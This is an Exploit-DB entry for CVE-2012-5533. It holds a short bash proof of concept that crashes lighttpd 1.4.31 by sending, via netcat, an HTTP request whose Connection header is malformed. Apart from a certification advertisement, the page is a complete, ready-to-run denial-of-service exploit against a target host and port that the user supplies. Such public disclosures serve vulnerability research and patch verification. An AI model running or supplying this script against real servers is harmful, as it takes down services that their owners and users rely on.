lighttpd 1.4.31 - Denial of Service (PoC)

EDB-ID:

22902


Author:

t4c

Type:

dos


Platform:

Linux

Date:

2012-11-22


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

#!/bin/bash
# Exploit Title: simple lighttpd 1.4.31 DOS POC
# Date: 11/21/2012
# Exploit Author: t4c@ghcif.de
# Vendor Homepage: http://www.lighttpd.net
# Software Link: http://download.lighttpd.net/lighttpd/releases-1.4.x/lighttpd-1.4.31.tar.gz 
# Version: 1.4.31
# Tested on: Debian Linux, Gentoo Linux, Arch Linux
# CVE: CVE-2012-5533

if [ $# -lt 2 ]
then
	echo "usage :$0 <Host/IP> <Port>"
else
	echo -ne "GET / HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n" | nc $1 $2
fi